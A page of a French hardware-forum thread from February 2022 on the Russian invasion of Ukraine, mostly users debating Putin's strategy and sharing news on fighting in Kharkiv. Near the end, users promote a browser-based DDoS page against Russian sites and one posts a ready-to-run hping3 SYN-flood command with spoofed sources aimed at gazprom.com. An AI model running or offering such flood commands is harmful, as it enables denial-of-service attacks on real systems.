Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
2538 connectés 

 

 

 Mot :   Pseudo :  
  Aller à la page :
 
 Page :   1  2  3  4  5  ..  1793  1794  1795  ..  13601  13602  13603  13604  13605  13606
Auteur Sujet :

Guerre en Ukraine - Spectacle pyrotechnique offert par l'UA à Toropets /!\ FP

n°65295433
Shao-Bang
Hater de haters
Posté le 27-02-2022 à 08:36:27  profilanswer
 

Reprise du message précédent :

Sebwap a écrit :


Je sais pas si on a le droit d'en parler ici mais le mec de Coronalive donne des infos qui ont l'air bien plus fiable que sur le covid.


Il a l’air d’avoir des sources fiables [:implosion du tibia]


---------------
"Maintenant, Daisy, je veux que nous mettions au point un système de communication : quand je te mets un grand coup de coude dans la tronche, ça veut dire Ferme-la !"
mood
Publicité
Posté le 27-02-2022 à 08:36:27  profilanswer
 

n°65295434
Chips
Posté le 27-02-2022 à 08:36:37  profilanswer
 

fred_div91 a écrit :

Encore un topic, où il fait bon débattre.
Là aussi nous sommes "sommer" de choisir un camp ?
Sans discussion, sans contradiction, sans débat ...
Et bien sur choisir le bon camp (car nous savons) sous peine d'être définitivement cancellé.


 
[:kolombin:2]

n°65295435
M300A
Posté le 27-02-2022 à 08:36:37  profilanswer
 

tuity a écrit :

 


J'ai vraiment l'impression que l'invasion russe pensait trouvé une population acquise au moins en grande partie,

 

et une armée ukrainienne divisé et démotivé.

 

il y vraiment eu une erreur d'appréciation vis a vis de l'opinion ukrainienne.

 

Cela explique les pertes subies et le comportement des soldats russes qui pensaient juste avoir a faire a une fraction de l'armée ukrainienne.

 

Chaque jour qui passe montre que d'attaquer l'Ukraine hors dombass était vraiment une énorme erreur stratégique.

  



 

Aji aussi le sentiment que Poutine croyait à ses propres mensonges. Inquiétant.


---------------
:wq
n°65295437
Requiem
Posté le 27-02-2022 à 08:37:15  profilanswer
 

fred_div91 a écrit :

Encore un topic, où il fait bon débattre.
Là aussi nous sommes "sommer" de choisir un camp ?
Sans discussion, sans contradiction, sans débat ...
Et bien sur choisir le bon camp (car nous savons) sous peine d'être définitivement cancellé.  


 
Bizarrement c'est très souvent des zemmouristes ou assimilés qui prônent une espèce de neutralité fallacieuse.

n°65295438
Bloodyjust​ice
Gagnant par KO technique
Posté le 27-02-2022 à 08:37:24  profilanswer
 

farib a écrit :


c'est plus difficile de nier un tank qui tire sur ta gueule qu'un virus qui oui ne tue "que" 1%


Même 1% de la population c'est une quantité énorme de morts si  on laisse filer le virus.

n°65295440
epsiloneri​dani
Modérateur
Posté le 27-02-2022 à 08:37:36  profilanswer
 

fred_div91 a écrit :

Encore un topic, où il fait bon débattre.
Là aussi nous sommes "sommer" de choisir un camp ?
Sans discussion, sans contradiction, sans débat ...
Et bien sur choisir le bon camp (car nous savons) sous peine d'être définitivement cancellé.  


 
Comment je ne suis pas surpris de te retrouver en train de défendre le tyran qui envahit le pays voisin sans raison.

n°65295442
Coroners
les insoumis emmerdent le FN
Posté le 27-02-2022 à 08:38:26  profilanswer
 

tuity a écrit :

 


J'ai vraiment l'impression que l'invasion russe pensait trouvé une population acquise au moins en grande partie,

 

et une armée ukrainienne divisé et démotivé.

 

il y vraiment eu une erreur d'appréciation vis a vis de l'opinion ukrainienne.

 

Cela explique les pertes subies et le comportement des soldats russes qui pensaient juste avoir a faire a une fraction de l'armée ukrainienne.

 

Chaque jour qui passe montre que d'attaquer l'Ukraine hors dombass était vraiment une énorme erreur stratégique.

 

je pense que les images des gilets jaunes a du le conforter dans sa perception que les sociétés de l'ouest sont mures pour êtres cueillies et que la population sera prête à faire tomber son gouvernement :o

 


Message cité 1 fois
Message édité par Coroners le 27-02-2022 à 08:40:48
n°65295446
shebangz
Posté le 27-02-2022 à 08:39:49  profilanswer
 

epsiloneridani a écrit :


 
Comment je ne suis pas surpris de te retrouver en train de défendre le tyran qui envahit le pays voisin sans raison.


Vous pouvez arrêter de lui en mettre plein la gueule. On est évidemment 100% contre Poutine et l’Ukraine doit rester libre à l’issu de ce conflit.  
 
Il y a des morts et c’est malheureux. Je pense qu’il dit juste eu la situation est complexe et que 100% des soldats Russes ne sont pas des « méchants tueurs d’Ukrainien » mais des pantins de l’autre fou. Et qu’eux même vivent aussi des moments difficiles.

Message cité 5 fois
Message édité par shebangz le 27-02-2022 à 08:40:41
n°65295447
homunculus
Posté le 27-02-2022 à 08:40:10  profilanswer
 

Sasha2012 a écrit :

grave :/  
 
c'est comme dans les débats sur la seconde guerre mondiale, pas moyen de defendre l'Allemagne nazie sans se faire tomber dessus :/
 
Sais très grave.


 
Toi tu sais?  :o  
 
Vas y on attend tes arguments vu que Poutine a traité le gouvernement ukrainien de nazis, on va pouvoir faire le parallèle et comparer.

Message cité 2 fois
Message édité par homunculus le 27-02-2022 à 08:42:19
n°65295448
Coroners
les insoumis emmerdent le FN
Posté le 27-02-2022 à 08:40:10  profilanswer
 

xcluzif a écrit :


 
Intéressant  comme graphique. À brandir aux personnes qui vocifèrent que la France n'est plus une démocratie.


parce que tu crois ce genre de graphique toi ? :o

mood
Publicité
Posté le 27-02-2022 à 08:40:10  profilanswer
 

n°65295449
rokhlan
Posté le 27-02-2022 à 08:40:36  profilanswer
 

Vous avez remarqué que dans les communications publiques russes, ils ne parlent que d’une opération dans le Donbass ? :lol:

n°65295451
tuity
holala
Posté le 27-02-2022 à 08:41:14  profilanswer
 

M300A a écrit :


 
Aji aussi le sentiment que Poutine croyait à ses propres mensonges. Inquiétant.


 
 
Oui et très mal renseigné.  
 
Depuis le début je ne comprends pas cette volonté d'aller a Kiev capturer le pdt ukrainien.  
 
Ce genre d'action est possible dans un pays ou règne un dictateur et une armée faible et non motivé.
 
C'est assez incroyable quant on y pense pour une action d'une telle envergure

n°65295453
Keepitreal
-Où es tu? -Dans ton cul!
Posté le 27-02-2022 à 08:41:19  profilanswer
 

buscape30 a écrit :


Selon ce pilote de chasse tout se passe très bien pour les Russes
https://youtu.be/7xEhN_LbOGI


 
Ce pilote de chasse est loin d’être un blaireau.  
Au moment ou il a été interviewé, parce que ça date, ATÉ a effectivement raison. La tactique russe était au top jusque là. Et puis derrière au sol c’est une autre histoire. Tant mieux si les russes en chient.


---------------
Tu bluffes Masoni. ESTAC 1986-2016. Ni fleur, ni couronne.
n°65295455
M300A
Posté le 27-02-2022 à 08:43:02  profilanswer
 

tuity a écrit :

 


Oui et très mal renseigné.

 

Depuis le début je ne comprends pas cette volonté d'aller a Kiev capturer le pdt ukrainien.

 

Ce genre d'action est possible dans un pays ou règne un dictateur et une armée faible et non motivé.

 

C'est assez incroyable quant on y pense pour une action d'une telle envergure

 

Mais t'étais pas un troll russe toi au départ ?  :heink:


---------------
:wq
n°65295457
Lemminkain​en
Chantre de la lyre
Posté le 27-02-2022 à 08:44:27  profilanswer
 

tuity a écrit :


 
 
Oui et très mal renseigné.  
 
Depuis le début je ne comprends pas cette volonté d'aller a Kiev capturer le pdt ukrainien.  
 
Ce genre d'action est possible dans un pays ou règne un dictateur et une armée faible et non motivé.
 
C'est assez incroyable quant on y pense pour une action d'une telle envergure


C'est un dictateur. A la vieille école.
 
Je pense que ces généraux ne lui montraient pas vraiment l'état de son armée. Ils préféraient détourner la réalité que de se faire "fussiler" ou "rétrograder" car ne pouvait pas plaire à Poutine. C'est une suposition, mais quand je vois ça :
 
https://www.mediafax.ro/externe/put [...] i-20558790
 
Je me dis qu'on doit pas être trop loin de la vérité.
 


---------------
Que vois-tu quand tu fermes les yeux ?
n°65295461
Sasha2012
Hé mon jeune
Posté le 27-02-2022 à 08:45:15  profilanswer
 

Coroners a écrit :


putain c'est quoi ce truc ? :lol:
 
si tout hfr s'y met on fait tomber les sites russes :lol:


Il y a toujours plusieurs sites de la liste qui sont inaccessibles :sol:
 
allez, go le bataillon HFR :o
 
Lien dans ma signature, a ouvrir sur un PC idéalement :o

n°65295465
petitebrun​ette1
Posté le 27-02-2022 à 08:46:04  profilanswer
 

tuity a écrit :


 
 
Oui et très mal renseigné.  
 
Depuis le début je ne comprends pas cette volonté d'aller a Kiev capturer le pdt ukrainien.  
 
Ce genre d'action est possible dans un pays ou règne un dictateur et une armée faible et non motivé.
 
C'est assez incroyable quant on y pense pour une action d'une telle envergure


Pas du tout.
 C'est très cohérent, au contraire. C'est même la principale "prise" qu'ils  feraient.
 C'est automatique: Il faut capturer la tête de l'Etat, le chef. ça assied immédiatement l'autorité du nouveau pouvoir en place et décapite toute la résistance.
Encore plus quand on voit le travail de ce dernier pour mobiliser ses troupes.
 Son nom est le 1er sur leur liste noire, c'est évident.
 
 Il a beaucoup de souci à se faire  :(


---------------
Reviens,bgx  
n°65295467
Nico77
Posté le 27-02-2022 à 08:46:19  profilanswer
 

Un résumé de ce qu'il s'est passé cette nuit ? Kharkiv est tombé ? Des news sur Kiev ?

n°65295473
boumbo
3xpl0its
Posté le 27-02-2022 à 08:46:57  profilanswer
 

Nico77 a écrit :

Un résumé de ce qu'il s'est passé cette nuit ? Kharkiv est tombé ? Des news sur Kiev ?


 
Des combats à Kharkiv en ce moment apparemment :
 

https://gitlab.com/BZHDeveloper/hfr/-/raw/master/twitter-logo.png AFP News Agency [:yoann riou:9] (@AFP) :

#BREAKING Street fighting in Ukraine's second city Kharkiv: AFP  
https://rehost.diberie.com/Rehost?size=min&url=https://pbs.twimg.com/media/FMlfjaBagAEuTfm.jpg


 

https://gitlab.com/BZHDeveloper/hfr/-/raw/master/twitter-logo.png AFP News Agency [:yoann riou:9] (@AFP) :

#UPDATE  
 
Machine gun fire and explosions rocked Kharkiv as street fighting raged after Russia's invading forces broke into the city, an AFP journalist said.  
 
The wreckage of a Russian armoured vehicle smouldered in one street and several others had been abandoned.

Message cité 1 fois
Message édité par boumbo le 27-02-2022 à 08:47:26

---------------
Terminatux est la petite pute d’Ernestor
n°65295474
M300A
Posté le 27-02-2022 à 08:47:04  profilanswer
 

Lemminkainen a écrit :


C'est un dictateur. A la vieille école.

 

Je pense que ces généraux ne lui montraient pas vraiment l'état de son armée. Ils préféraient détourner la réalité que de se faire "fussiler" ou "rétrograder" car ne pouvait pas plaire à Poutine. C'est une suposition, mais quand je vois ça :

 

https://www.mediafax.ro/externe/put [...] i-20558790

 

Je me dis qu'on doit pas être trop loin de la vérité.

 


 

Marrant, le roumain ça a l'air encore plus facile à lire que de l'italien lu espagnol, j'aurai pas cru


---------------
:wq
n°65295478
Coroners
les insoumis emmerdent le FN
Posté le 27-02-2022 à 08:48:04  profilanswer
 

Sasha2012 a écrit :


Il y a toujours plusieurs sites de la liste qui sont inaccessibles :sol:
 
allez, go le bataillon HFR :o
 
Lien dans ma signature, a ouvrir sur un PC idéalement :o


c'est normal que ça occupe le DD à 100% ? :o

n°65295480
dje33
57 BUTS !!!
Posté le 27-02-2022 à 08:48:22  profilanswer
 

Maouuu a écrit :


Pour la faire tomber il faudrait le controle d'attitude via la station Ricaine, la c'est juste la foutre en l'air par overspin


La partie US n'a pas le contrôle de l'altitude de la station.

 

Dans l'espace Altitude = vitesse
Et la partie US n'a pas de moteur pour gagner de la vitesse.

n°65295481
tuity
holala
Posté le 27-02-2022 à 08:48:25  profilanswer
 

M300A a écrit :


 
Mais t'étais pas un troll russe toi au départ ?  :heink:


 
 
Non depuis le début je tente d'expliquer pourquoi on en est la avec Poutine.  
 
Et de donner un contexte historique et géopolitique sur l'extension de l'influence occidentale a l'est,
 
pour comprendre les causes et conséquences plutôt qu'être dans le manichéisme primaire.
 
J'appelle pas ca être un troll
 

n°65295482
240-185
Yoshi anthropophage ò('')ó
Posté le 27-02-2022 à 08:49:05  profilanswer
 

shebangz a écrit :


Vous pouvez arrêter de lui en mettre plein la gueule. On est évidemment 100% contre Poutine et l’Ukraine doit rester libre à l’issu de ce conflit.

 

Il y a des morts et c’est malheureux. Je pense qu’il dit juste eu la situation est complexe et que 100% des soldats Russes ne sont pas des « méchants tueurs d’Ukrainien » mais des pantins de l’autre fou. Et qu’eux même vivent aussi des moments difficiles.


Personne ne blâme les pauvres âmes envoyées au charbon en Ukraine.


---------------
Tel un automate, le Yoshi noir s'avance vers le chef des Chain Chomps et lui dit : « Le CEC reprend du service : http://www.latelier240.fr/CEC »
n°65295483
elbarto
Posté le 27-02-2022 à 08:49:09  profilanswer
 

homunculus a écrit :


Le pays ferme sa gueule dans sa grande majorité et les soldats font ce qu'on leur ordonne.


 
Contrairement au peuple français, frondeur par nature  [:lardoncru:2] [:bisounours58] [:1000trees:5]
 
Dans l'histoire russe il y a eu 1917, 1991, puis plus rien [:kolombin].
 
Bon il y a eu les femens qui ont tenté le coup avec courage, mais les autres catégories n'ont pas embrayé, le patriarcat trop ancré dans les mentalités, et ce sentiment de passivité/soumission, les oligarques achetés avec le pognon.
Il y aura probablement un mea-culpa de la population, des élites russes à faire, lorsque Poutine ne sera plus au pouvoir, les générations futures se demanderont comment un tel despote a pu se maintenir aussi longtemps au pouvoir.


Message édité par elbarto le 27-02-2022 à 08:50:40
n°65295485
verdoux
And I'm still waiting
Posté le 27-02-2022 à 08:49:16  profilanswer
 

Coroners a écrit :


 
je pense que les images des gilets jaunes a du le conforter dans sa perception que les sociétés de l'ouest sont mures pour êtres cueillies et que la population sera prête à faire tomber son gouvernement :o
 
 


C'est clair qu'en France la résistance aurait été moins forte et que certains leaders politiques auraient pris l'avion pour préparer le gouvernement fantoche à Moscou :o

n°65295489
usma16
Posté le 27-02-2022 à 08:50:58  profilanswer
 

Requiem a écrit :

 

Bizarrement c'est très souvent des zemmouristes ou assimilés qui prônent une espèce de neutralité fallacieuse.

 

Vous pouvez arrêter de citer le nom de cette poubelle ambulante chaque deux page svp ?

n°65295490
_OttO_
Rital contrarié
Posté le 27-02-2022 à 08:50:59  profilanswer
 

*PINCETTES*
Des collabos ukrainiens placeraient eux-mêmes des cibles pour le compte de l'armée russe, 2 videos
https://twitter.com/IntelDoge/statu [...] 3320764422


---------------
Giant -
n°65295491
Bloodyjust​ice
Gagnant par KO technique
Posté le 27-02-2022 à 08:51:30  profilanswer
 

shebangz a écrit :


Vous pouvez arrêter de lui en mettre plein la gueule. On est évidemment 100% contre Poutine et l’Ukraine doit rester libre à l’issu de ce conflit.

 

Il y a des morts et c’est malheureux. Je pense qu’il dit juste eu la situation est complexe et que 100% des soldats Russes ne sont pas des « méchants tueurs d’Ukrainien » mais des pantins de l’autre fou. Et qu’eux même vivent aussi des moments difficiles.


Pas grand monde ici n'a amalgamé la majorité des soldats russes à des batards...

n°65295493
tuity
holala
Posté le 27-02-2022 à 08:52:13  profilanswer
 

petitebrunette1 a écrit :


Pas du tout.
 C'est très cohérent, au contraire. C'est même la principale "prise" qu'ils  feraient.
 C'est automatique: Il faut capturer la tête de l'Etat, le chef. ça assied immédiatement l'autorité du nouveau pouvoir en place et décapite toute la résistance.
Encore plus quand on voit le travail de ce dernier pour mobiliser ses troupes.
 Son nom est le 1er sur leur liste noire, c'est évident.
 
 Il a beaucoup de souci à se faire  :(


 
 
On ne capture pas un chef d'état comme ca, s'il est soutenu par sa population et son armée.  
 
Ils l'ont pas fait en Tchétchénie petit pays de quelques millions d'habitants c'est pas pour le faire sur un pays de cette taille.
 
Je pense vraiment qu'ils ont envisagé avoir un soutien de la population et une défection de l'armée.
 

n°65295494
broddok27
Posté le 27-02-2022 à 08:52:16  profilanswer
 

shebangz a écrit :


Vous pouvez arrêter de lui en mettre plein la gueule. On est évidemment 100% contre Poutine et l’Ukraine doit rester libre à l’issu de ce conflit.  
 
Il y a des morts et c’est malheureux. Je pense qu’il dit juste eu la situation est complexe et que 100% des soldats Russes ne sont pas des « méchants tueurs d’Ukrainien » mais des pantins de l’autre fou. Et qu’eux même vivent aussi des moments difficiles.


POutiNe iL eST pas CON, il FeRa JAmaiS une AttAQUE en UKraine.  [:kappa:7]  
 
Quand le mec te dit que ton pays n'existe pas et qu'il faut le dénazifier, non c'est pas si compliqué que ça.  

n°65295495
gars_lent
Pas rapide
Posté le 27-02-2022 à 08:52:37  profilanswer
 

Bloodyjustice a écrit :


Tu es toujours libre de rejoindre le gentil Putin afin de participer à de véritables guérillas, pas comme ces lâches de vilain ukrénien.


 
 
Bon laissez tomber, ce topic commence à me faire flipper.
Je suis complètement en faveur des ukrainiens, je demande juste d’aller plus loin que « méchants russes » et on me taxe de pro Poutine. Sérieux, je voudrais pas vous avoir comme voisin en temps de guerre, le moindre geste suspect et on se ferait balancer  :pfff:


---------------
Porte bien son pseudo.
n°65295496
Tammuz
Posté le 27-02-2022 à 08:52:39  profilanswer
 

Blazevic a écrit :


 
Toujours facile à dire ça, avec le recul et quand on est du bon côté de l'histoire ...
 
 


 
Et puis c'est toujours :
 
- Mais il aurait fallu agir plus tôt !   [:hollandais2:2]  
 
- Oui d'accord, et en faisant quoi ?   [:ethnik:1]  
 
- Je sais pas, mais il aurait fallu le faire plus tôt.   [:eraser17]  
 
 
 
 
 [:caudacien:1]


---------------
"Je tape sur un clavier avec les 10 doigts sans regarder et je ne me relis pas"
n°65295498
knup74
Posté le 27-02-2022 à 08:52:52  profilanswer
 

tuity a écrit :

 


Non depuis le début je tente d'expliquer pourquoi on en est la avec Poutine.

 

Et de donner un contexte historique et géopolitique sur l'extension de l'influence occidentale a l'est,

 

pour comprendre les causes et conséquences plutôt qu'être dans le manichéisme primaire.

 

J'appelle pas ca être un troll

 


 

Je sais pas si tu as remarqué mais quand poutine a attaqué il a pas parlé d'OTAN ou de méchants américains.

 

Il a fait une déclaration lunaire a base de "L'Ukraine c'est même pas un vrai pays, c'est une terre russe d'abords alors je vais aller denazifier ce pays dirigés par des nazi et toxicomane"

 

C'est complètement wtf, poutine est sénile.

 


---------------
Profil Hots
n°65295500
madyodaseb
Posté le 27-02-2022 à 08:53:24  profilanswer
 

shebangz a écrit :


Vous pouvez arrêter de lui en mettre plein la gueule. On est évidemment 100% contre Poutine et l’Ukraine doit rester libre à l’issu de ce conflit.  
 
Il y a des morts et c’est malheureux. Je pense qu’il dit juste eu la situation est complexe et que 100% des soldats Russes ne sont pas des « méchants tueurs d’Ukrainien » mais des pantins de l’autre fou. Et qu’eux même vivent aussi des moments difficiles.


Cette justification digne de la France aux grandes heures du régime de Vichy :o

n°65295501
buscape30
Posté le 27-02-2022 à 08:53:46  profilanswer
 
n°65295502
Blazevic
Un peu plus à l'est
Posté le 27-02-2022 à 08:53:48  profilanswer
 

M300A a écrit :


 
Marrant, le roumain ça a l'air encore plus facile à lire que de l'italien lu espagnol, j'aurai pas cru


 
Oui d'ailleurs apparemment le Pentagone se dit "Pentagonul" en roumain. Hasard ou réalité scientifique ?  [:diogene_le_cynique:1]  

n°65295504
armageddin​don
Posté le 27-02-2022 à 08:53:57  profilanswer
 

boumbo a écrit :

Des combats à Kharkiv en ce moment apparemment :


 

https://gitlab.com/BZHDeveloper/hfr/-/raw/master/twitter-logo.png AFP News Agency [:yoann riou:9] (@AFP) :

#BREAKING  
Putin salutes 'heroism' of Russian special forces fighting in Ukraine  
https://rehost.diberie.com/Rehost?size=min&url=https://pbs.twimg.com/media/FMlfMFnakAAC6YC.jpg


 
On salut les frères qui s'entretuent et l'excellent taff des gens qui doivent gérer les cadavres.
 

tuity a écrit :

Non depuis le début je tente d'expliquer pourquoi on en est la avec Poutine.  
Et de donner un contexte historique et géopolitique sur l'extension de l'influence occidentale a l'est,
pour comprendre les causes et conséquences plutôt qu'être dans le manichéisme primaire.
J'appelle pas ca être un troll


 
 [:baron lichteinberg:5]


---------------
(topic Reconquête, 18 juin 2024) "Des années à dire que que le problème c’est les arabes pour finir par se faire dépouiller par une blondasse." - Abonisyah
n°65295505
Zeplusoif
Posté le 27-02-2022 à 08:54:23  profilanswer
 

Apparemment Zelensky a sorti une vidéo ce matin, et a notamment rejeté la proposition de pourparlers à Minsk. Ailleurs, oui, mais pas à Minsk. Il a bien raison


---------------
If fate doesn't make you laugh, then you don't get the joke
n°65295506
Requiem
Posté le 27-02-2022 à 08:54:26  profilanswer
 

usma16 a écrit :


 
Vous pouvez arrêter de citer le nom de cette poubelle ambulante chaque deux page svp ?  


 
C'est une réalité

n°65295507
Chips
Posté le 27-02-2022 à 08:54:33  profilanswer
 

Sasha2012 a écrit :

il faudrait lancer un SETI DDOS @ RUSSIAN FAKE NEWS :o
 
peut etre on peut réouvrir la défunte catégorie SETI@HOME d'hfr pour l'occasion ?
 
je reposte le lien au cas ou : https://vug.pl/takeRussiaDown.html
 
jv le mettre en signature aussi


 
 
Interessant  [:digiamb:1]
 
Je vais rester sur du bon vieux syn flood perso
 

Code :
  1. sudo hping3 www.gazprom.com -p 80 -S --flood -V --rand-source

Message cité 2 fois
Message édité par Chips le 27-02-2022 à 08:55:17
mood
Publicité
Posté le   profilanswer
 

 Page :   1  2  3  4  5  ..  1793  1794  1795  ..  13601  13602  13603  13604  13605  13606

Aller à :
Ajouter une réponse
 

Sujets relatifs
Je suis encore écoeuré, pas moyen de voir Ukraine-FranceVirus Ebola en Ukraine?
Films & Ukrainermi et caf le bordel
Ecologie - fuite massive de méthane en californie - dernier postC'est quoi ce bordel!? Blackmamba
Cherche adresse ambassade GB en UkraineC'est quoi ce bordel ?
les Iouchtchenko , l'Ukraine et la corruptionLe topic des chambres en bordel [photos inside]
Plus de sujets relatifs à : Guerre en Ukraine - Spectacle pyrotechnique offert par l'UA à Toropets /!\ FP


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR